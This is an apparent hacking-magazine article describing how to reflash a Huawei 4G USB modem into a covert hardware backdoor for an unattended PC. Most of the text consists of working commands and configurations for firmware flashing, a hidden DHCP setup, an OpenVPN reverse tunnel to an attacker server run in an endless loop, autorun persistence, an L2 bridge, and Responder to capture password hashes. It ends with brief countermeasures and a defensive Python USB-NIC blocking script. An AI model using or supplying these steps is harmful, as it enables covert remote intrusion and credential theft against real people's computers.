
What if someone connects a special device to a computer left unattended, thus gaining remote access to it from anywhere in the world? All the USB-based device emulation magic described earlier will be at the attacker’s disposal. But this time, the primary purpose of your malicious device is uninterrupted remote access, not attacks.
This article continues the series of publications describing practical hacking and attacking techniques involving makeshift devices that can be easily assembled at home. You will learn how to gain unauthorized access to protected information and how to protect your own data from such attacks. The previous article in this series was Evil Ethernet. BadUSB-ETH attack in detail.
Modern 4G modems (HiLink) are only slightly larger than a flash drive, and they run Linux. For instance, Android 2.3 / Linux 3.4.5 + VxWorks v6.8 for GSM. Such USB-powered devices are fully autonomous. As soon as the modem is plugged into a PC, its OS boots (which takes a few seconds) and presents the USB device to the host as a network card.
The best hardware solution for the attack described in this article is a HiLink modem: it’s compact and equipped with a 4G module. For instance, the popular Huawei E3372h-153 that can be reflashed and is supported by a huge fan community.
Modern 4G modems are HiLink modems (i.e. the system identifies them as network cards). As a result, the OS running on the user’s PC conveniently interacts with the Internet via such a virtual Ethernet network. But the point is that the modem itself can be used to interact with the PC it’s plugged into. A fully functional OS runs inside this modem emulating a network card (similar to the BadUSB-ETH attack). Such a device can be used to establish a foothold on the compromised PC as shown below.

To establish a foothold in similar circumstances, you can use a ready-made device called LAN Turtle, but it lacks an important feature: support for a 4G channel that is external to the attacked system.
Implementation
The device is so well suited for remote access that it requires a minimum of modifications. Its main advantages are as follows:
- no additional power is required;
- covert connection: the device won’t be visible on the local network as it operates only inside the compromised PC; and
- an autonomous 4G data transmission channel enables you to maintain access even inside isolated local networks.
For maximum efficiency, the device should be slightly modified: you have to reflash the modem. After this modification, the modem OS will automatically establish a VPN connection with the control server via the 4G network (an external channel), thus providing stable network access to the PC the modem is plugged into. You can access the modem OS in one of the following ways:
telnet 192.168.8.1
adb connect 192.168.8.1:5555
To make further modifications, you have to enable ports for AT commands:
curl http://192.168.8.1/html/switchDebugMode.html
minicom -D /dev/ttyUSB0
After enabling the debug mode, the modem OS can be modified: you have to switch to the flash mode and flash the open firmware:
at^godload # Switch to the flash mode. The modem will restart
sudo ./balong_flash -p /dev/ttyUSB0 E3372h-153_Update_22.200.15.00.00_M_AT_05.10_nv.exe
When the modem starts, it usually emulates a CD-ROM with drivers and an SD card. These functions must be disabled since the device needs only network emulation:
AT^NVWREX=50091,0,60,1 0 0 0 FF 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 A3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 # Don't switch to the CD-ROM mode at startup; RNDIS/CDC is enabled
AT^RESET # Restart
Next, you have to modify the DHCP server so that the modem doesn’t announce itself as a gateway, and the routing table on the PC isn’t disrupted. The modem should connect as covertly as possible:
cat <<EE > /data/config
Interface br0
MinLease 30
Vendorid c0012
Address main
EnbSrv 1
Start 192.168.8.100
End 192.168.8.200
Option lease 86400
Option subnet 255.255.255.0
Address main end
EE
Now you have to copy the OpenVPN client with the driver and config to the modem. To avoid compilation, ready-made binaries can be downloaded from the 4PDA website:
adb push tun.ko /online/ovpn/
adb push openvpn /online/ovpn/
adb push vds.ovpn /online/ovpn/
cat <<EE > /data/vpn.sh
#!/system/bin/busybox sh
while :; do /online/ovpn/openvpn --config /online/ovpn/vds.ovpn --route-noexec; done
EE
chmod 700 /data/vpn.sh
busybox passwd
reboot
To make the reverse connection more reliable, VPN should be run in an infinite loop. Finally, you have to configure autorun for all this stuff and organize the routing of packets from the 4G network towards the target computer through the modem:
mount -o remount,rw /dev/block/mtdblock16
cat <<EE >> /system/etc/autorun.sh
/data/autorun.sh &
EE
cat <<EE > /data/autorun.sh
#!/system/bin/busybox sh
killall dhcps.real
cp /data/config /var/dhcp/dhcps/config
dhcps.real &
sleep 5
insmod /online/ovpn/tun.ko
/data/vpn.sh &
iptables -t nat -A POSTROUTING -o br0 -s 172.16.0.0/24 -j MASQUERADE
iptables -I INPUT 1 -i br0 -p tcp --dport 80 -j DROP
iptables -I FORWARD 2 -i br0 -o wan0 -j DROP
EE
chmod 700 /data/autorun.sh
Important: access to the 4G Internet from the target PC must be prohibited on the modem, and the web admin panel must be hidden. Now the modified modem can be used as a hardware backdoor.
Establishing a foothold
Your hardware backdoor can look something like this.

Looks pretty innocent, doesn’t it? Just a memory stick, an ordinary user will think. If the attacker can access a USB port on the target PC, chances are high that no one notices such a ‘strange’ device for a while. This grants the attacker long-term network access to the target via an autonomous channel. Note that remote connection is implemented via an external channel, and you no longer need the internal network to access the Internet. Your mobile network channel grants you guaranteed remote access.

The smartphone and LAN Turtle are connected to the same VPN server that connects their network traffic. The 4G modem is reconfigured to pass traffic in an unusual reverse direction: through itself towards the computer (like a gateway). As a result, the attacker maintains direct network access to the compromised PC even at a distance of thousands of kilometers.
In this example, the phone and the laptop aren’t connected directly and operate in different networks. The laptop is connected to the local network via a cable without using the Internet, while the phone is connected over 4G. But when you add a route to the victim’s computer via a 4G modem, you gain remote access to this PC.
L2 access
This foothold creation technique provides network access only to the PC the modem is connected to. Further actions of the attacker require logical access (i.e. hacking the system and controlling it). In the case of success, this grants you both control over the attacked PC and the ability to advance deeper into the local network. To facilitate attacks on the target system, you may have to establish an L2VPN tunnel closer to the target.
Another VPN tunnel should be forwarded inside the existing one. The first VPN was used exclusively for communication with the lan_turtle device; while the second one will grant you the maximum possible network access to the target PC via the USB-emulated network.
To achieve this, you have to execute a few more commands inside the USB modem to create a VPN tunnel and place the newly-created virtual interface inside a network bridge with the USB interface:
./openvpn --config l2.ovpn --route-noexec
brctl addif br0 tap1
ifconfig tap1 0
The configuration file can be created directly inside the modem; its content should be as follows:
l2.ovpn
client
proto tcp
dev tap
remote 172.16.0.10 1194
<ca>
</ca>
<cert>
</cert>
<key>
</key>
keepalive 10 60
persist-key
persist-tun
The L2 VPN interface is assigned an IP address that isn’t actually needed, since the first OpenVPN tunnel is already running. You can discard that address and just place the interface inside the bridge. As a result, L2 packets from the compromised PC will go to the VPN interface. Not only will you get logical network access to the target PC, but you’ll see it as if you had plugged an Ethernet cable into it.
On the attacker’s side, all you need to do is connect to the modem, create a VPN tunnel, and then manually set its IP address from the network adapter subnet of the victim’s PC:
sudo openvpn --config lan_turtle.ovpn --route-noexec
sudo ifconfig tap0 192.168.8.200/24
The configuration file used to connect to lan_turtle and forward an L2VPN tunnel is as follows:
lan_turtle.ovpn
local 172.16.0.10
port 1194
proto tcp
dev tap
user nobody
<ca>
</ca>
<cert>
</cert>
<key>
</key>
<dh>
</dh>
server 192.168.9.0 255.255.255.0
keepalive 10 180
verb 3
Now the attacker gains full network access to the victim’s computer via a 4G modem. The L2 tunnel makes it possible to attack link-layer protocols as well as NetBIOS, for instance with Responder, and retrieve the user’s password hash:
responder -I tap0 -r -d -w -F
Protection
Since the attacker penetrates into the target PC through a USB port, the countermeasures are the same as in the case of BadUSB:
- use specialized software solutions to block untrusted USB devices;
- disable support for USB network cards in group policies;
- inspect computers on a regular basis; and
- control physical access to the PC.
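As an added example (not code from the article), the following Linux host-side check implements the first two countermeasures: it classifies a USB device by its interface descriptors, marks anything that would bind a USB network driver (RNDIS, CDC ECM/NCM) for deauthorization unless it is allow-listed, and can read real devices from sysfs. The sample descriptors and product ids are constructed placeholders (12d1 is Huawei's registered USB vendor id); the function names are my own.

```python
from dataclasses import dataclass
from pathlib import Path

# USB interface class codes under which a device presents itself as a NIC
CDC_CLASS = 0x02                        # Communications Device Class
CDC_NET_SUBCLASSES = {0x06, 0x0D}       # ECM (Ethernet) and NCM
RNDIS_TRIPLES = {(0xE0, 0x01, 0x03),    # RNDIS as "wireless controller"
                 (0x02, 0x02, 0xFF)}    # RNDIS as vendor-specific CDC ACM

@dataclass
class UsbDevice:
    vendor: str       # idVendor as 4 hex digits, as sysfs reports it
    product: str      # idProduct as 4 hex digits
    interfaces: list  # (bInterfaceClass, bInterfaceSubClass, bInterfaceProtocol)

def is_network_interface(if_class, subclass, protocol):
    """True if this interface descriptor would bind a USB network driver."""
    if (if_class, subclass, protocol) in RNDIS_TRIPLES:
        return True
    return if_class == CDC_CLASS and subclass in CDC_NET_SUBCLASSES

def decide(dev, allowlist):
    """'allow' for allow-listed or non-network devices, else 'deauthorize'."""
    if f"{dev.vendor}:{dev.product}" in allowlist:
        return "allow"
    if any(is_network_interface(*i) for i in dev.interfaces):
        return "deauthorize"
    return "allow"

def read_sysfs_device(dev_dir):
    """Build a UsbDevice from a Linux /sys/bus/usb/devices/<bus-port> directory."""
    dev_dir = Path(dev_dir)
    ifaces = [tuple(int((d / a).read_text(), 16) for a in
                    ("bInterfaceClass", "bInterfaceSubClass", "bInterfaceProtocol"))
              for d in dev_dir.glob(f"{dev_dir.name}:*")]   # one subdir per interface
    return UsbDevice((dev_dir / "idVendor").read_text().strip(),
                     (dev_dir / "idProduct").read_text().strip(), ifaces)

def deauthorize(dev_dir):
    """Detach the device: writing 0 to 'authorized' makes the kernel unbind it."""
    (Path(dev_dir) / "authorized").write_text("0")

# Constructed sample descriptors (not captured from real hardware): a HiLink-style
# modem exposing RNDIS + CDC ECM + CDC Data, and a plain mass-storage stick (class 0x08).
MODEM = UsbDevice("12d1", "ffff", [(0xE0, 0x01, 0x03), (0x02, 0x06, 0x00), (0x0A, 0x00, 0x00)])
STICK = UsbDevice("ffff", "0001", [(0x08, 0x06, 0x50)])
```

Run as root against a directory such as /sys/bus/usb/devices/1-1 (read_sysfs_device, then decide, then deauthorize on a "deauthorize" verdict); a udev rule on the usb subsystem can trigger the same check on hotplug.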
Good luck!
